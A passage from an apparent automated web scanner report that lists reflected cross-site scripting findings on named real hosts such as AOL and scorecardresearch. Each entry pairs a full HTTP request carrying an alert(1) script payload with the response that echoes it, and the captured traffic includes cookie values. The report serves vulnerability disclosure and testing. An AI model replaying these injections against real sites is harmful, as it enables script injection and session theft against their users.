Content-Length: 84
Connection: keep-alive

Unknown API key: (vuy5aqx2hg8yv997yw9e5jr4bbc7c<script>alert(1)</script>5c175562314)

1.186. http://api.screenname.aol.com/auth/getToken [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload c0fb7<script>alert(1)</script>4eb17889752 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao106HS28rHt73lS&attributes=displayName,loginId,profileUrl,pictureUrl,providerStr,providerDisplayName&f=json&c=jsonp1300831459267c0fb7<script>alert(1)</script>4eb17889752 HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1299589746302-New%7C1362661746302%3B%20s_nrgvo%3DNew%7C1362661746303%3B

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:30 GMT
Set-Cookie: JSESSIONID=3125B55D850FB8447F6406A14870FE92; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIHZXVUdXWG5JR3RwcjBjVW1zVjdvcDVkV292OD0%3D-SSQdmqasJXW7AratTMW0Ebo0fFONkRgKFU1mS%2B7aRm1K3m4HomBFqlhs1Aa2f2iG; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp1300831459267c0fb7<script>alert(1)</script>4eb17889752({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

1.187. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b50f9<script>alert(1)</script>f168daa8440 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7b50f9<script>alert(1)</script>f168daa8440&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7b50f9<script>alert(1)</script>f168daa8440", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.188. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 3463d<script>alert(1)</script>652bf18a907 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=3463d<script>alert(1)</script>652bf18a907&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"3463d<script>alert(1)</script>652bf18a907", c16:"", r:""});

1.189. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 801a4<script>alert(1)</script>286c167a590 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888801a4<script>alert(1)</script>286c167a590&c3=2&c4=&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888801a4<script>alert(1)</script>286c167a590", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.190. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 77d24<script>alert(1)</script>f2b8119079a was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=277d24<script>alert(1)</script>f2b8119079a&c4=&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"277d24<script>alert(1)</script>f2b8119079a", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.191. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8fd25<script>alert(1)</script>15769badf77 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=8fd25<script>alert(1)</script>15769badf77&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"8fd25<script>alert(1)</script>15769badf77", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.192. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 52d74<script>alert(1)</script>ea9f67b9526 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=52d74<script>alert(1)</script>ea9f67b9526&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"52d74<script>alert(1)</script>ea9f67b9526", c6:"", c10:"", c15:"", c16:"", r:""});

1.193. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 97fd8<script>alert(1)</script>1f25e258caa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=97fd8<script>alert(1)</script>1f25e258caa&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"97fd8<script>alert(1)</script>1f25e258caa", c10:"", c15:"", c16:"", r:""});

1.194. http://c.aol.com/read/_share_counts [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/_share_counts

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4950b<script>alert(1)</script>2c4c70b388a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/_share_counts?return_obj=true&permalink=http%3A%2F%2Fwww.aolnews.com%2F2011%2F03%2F22%2Fus-commander-we-wont-stop-until-libya-is-in-compliance%2F&dirty=true&callback=jsonp13008314972494950b<script>alert(1)</script>2c4c70b388a HTTP/1.1
Host: c.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolnews.com/category/nation/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1299589746302-New%7C1362661746302%3B%20s_nrgvo%3DNew%7C1362661746303%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: gcp.dirty=true; Expires=Tue, 22-Mar-2011 22:11:27 GMT; Path=/
Content-Type: application/json;charset=UTF-8
Date: Tue, 22 Mar 2011 22:06:26 GMT
Content-Length: 161

jsonp13008314972494950b<script>alert(1)</script>2c4c70b388a({
"status" : "OK",
"shares" : {
"twitter" : "1",
"print" : "5"
},
"comments" : -1
});

1.195. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload fd23b<script>alert(1)</script>050d3c5e27a was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerId=65879909001 HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=271&flashID=myExperience57142042001&bgcolor=%23FFFFFF&wmode=transparent&playerID=65879909001&publisherID=1214017254&isVid=true&linkBaseURL=http%3A%2F%2Fwww.sailingworld.com%2Fbrightcove_playlists%2Fvideo%2F814312930001&%40videoPlayer=814312930001&autoStart=&debuggerID=
content-type: application/x-amf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 482

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q2e0453ef68f902b62b792fae0d9251f80aa44507
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:00:55 GMT
Server:
Content-Length: 4214

......../1/onResult.....].
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
A........eAQ~~,AAAAAEhcbuY~,I8GEKf3z53IAPdrqMKxcfiS4n2k7cdBc.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO..mediaId.componentRefId.playerId    type.mediaDTO
..Bg...Z ..ivideoPlayerfd23b<script>alert(1)</script>050d3c5e27a..........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription
...[SNIP]...

1.196. http://cim.meebo.com/cmd/drads [impression parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /cmd/drads

Issue detail

The value of the impression request parameter is copied into the HTML document as plain text between tags. The payload a94be<script>alert(1)</script>39527c40ac9acc679 was submitted in the impression parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cmd/drads?mindset=AH%3D1%26AK%3D1%26AN%3D1%26AP%3D5%26AQ%3D1&referrer=&partner=tmz&tcookie=267e663c46bf3f71bb6e&impression_num=1&session_time=1&active=0&secure=false&clientVersion=10_3_13&type=DRMediaAlert&impression=http%3A%2F%2Fad.doubleclick.net%2Fimp%3Bv7%3Bx%3B234545403%3B0-0%3B0%3B48682791%3B24%2F24%3B34832749%2F34850604%2F1%3B%3B~aopt%3D2%2F0%2Fff%2F0%3B~okv%3D%3Bsecure%3Dfalse%3Bposition%3D1%3BAA%3D1%3BAB%3D5%3BAD%3D1%3BAF%3D1%3BAH%3D5%3BAI%3D5%3BAJ%3D1%3BAK%3D1%3BAL%3D5%3BAM%3D5%3BAN%3D5%3BAQ%3D1%3BAR%3D5%3BAS%3D5%3BAT%3D1%3BAU%3D1%3Bic17%3D1%3Bic22%3D1%3Bic16%3D1%3Bic12%3D1%3Bic24%3D1%3Bic10%3D1%3Bac17%3D1%3Bac14%3D1%3Bac10%3D1%3Bpc2%3D1%3Bpc1%3D1%3Bac2%3D1%3Bic3%3D1%3Bic2%3D1%3Bic6%3D1%3Bic5%3D1%3Bic19%3D1%3Bac16%3D1%3Bac12%3D1%3Bpc4%3D1%3Bic9%3D1%3Bac5%3D1%3Bic1%3D1%3Bac8%3D1%3Bsz%3D24x24%3Bdcmt%3Dtext%2Fhtml%3B~cs%3Do%253fhttp%3A%2F%2Fs0.2mdn.net%2Fdot.gif%3F7583680a94be<script>alert(1)</script>39527c40ac9acc679&click=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3ad2%2F3%2F0%2F%252a%2Fe%253B234545403%253B0-0%253B0%253B48682791%253B3634-24%2F24%253B34832749%2F34850604%2F1%253B%253B%257Eaopt%253D2%2F0%2Fff%2F0%253B%257Esscs%253D%253fhttp%3A%2F%2Fwww.meebo.com%2Fblank.html&operating_system=Windows&user_agent=Chrome%2010 HTTP/1.1
Host: cim.meebo.com
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_13&protocol=http%3A&network=tmz
Cache-Control: max-age=0
Origin: http://cim.meebo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=15a6c83c109b781d8bb4; meebo-cim-session=2ed7452f31bb7e416cec; tcookie=267e663c46bf3f71bb6e%26true%26AA%3D1%26AB%3D5%26AD%3D1%26AF%3D1%26AH%3D5%26AI%3D5%26AJ%3D1%26AK%3D1%26AL%3D5%26AM%3D5%26AN%3D5%26AQ%3D1%26AR%3D5%26AS%3D5%26AT%3D1%26AU%3D1%26ic17%3D1%26ic22%3D1%26ic16%3D1%26ic12%3D1%26ic24%3D1%26ic10%3D1%26ac17%3D1%26ac14%3D1%26ac10%3D1%26pc2%3D1%26pc1%3D1%26ac2%3D1%26ic3%3D1%26ic2%3D1%26ic6%3D1%26ic5%3D1%26ic19%3D1%26ac16%3D1%26ac12%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic1%3D1%26ac8%3D1%26AP%3D5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 22 Mar 2011 22:03:54 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 680

{"stat": "ok", "data": {"advertisement": {"impression": ["http://ad.doubleclick.net/imp;v7;x;234545403;0-0;0;48682791;24/24;34832749/34850604/1;;~aopt=2/0/ff/0;~okv=;secure=false;position=1;AA=1;AB=5;
...[SNIP]...
ic12=1;ic24=1;ic10=1;ac17=1;ac14=1;ac10=1;pc2=1;pc1=1;ac2=1;ic3=1;ic2=1;ic6=1;ic5=1;ic19=1;ac16=1;ac12=1;pc4=1;ic9=1;ac5=1;ic1=1;ac8=1;sz=24x24;dcmt=text/html;~cs=o%3fhttp://s0.2mdn.net/dot.gif?7583680a94be<script>alert(1)</script>39527c40ac9acc679", "http://r2d2.meebo.com/e.gif?component=DRMediaAlert&tm=35025668&adId=house&shareId=house&partner=tmz&type=impression"], "type": "house"}}}

1.197. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the esi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88954'-alert(1)-'c9f483b2c61 was submitted in the esi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adServer/GetInvite2.aspx?esi=true88954'-alert(1)-'c9f483b2c61&bannerID=173670&referer=ads.cnn.com HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1; IXAIBanners2399=173670; IXAIBannerCounter173670=1; IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; IXAICampaignCounter2399=1

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 23 Mar 2011 19:41:03 GMT
Connection: close
Cache-Control: no-store
Content-Length: 22006

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
cs.AddParam('timeinview',InsightExpress.Analytics.TotalTimeInView);},1000)}});InsightExpress.Path='/adserver/';InsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true88954'-alert(1)-'c9f483b2c61&bannerID=173670&referer=ads.cnn.com'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopInInvite({"Width":"300",
...[SNIP]...

1.198. http://core.insightexpressai.com/adServer/GetInvite2.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b92e'-alert(1)-'dabbc06a026 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=173670&referer=ads.cnn.com&2b92e'-alert(1)-'dabbc06a026=1 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
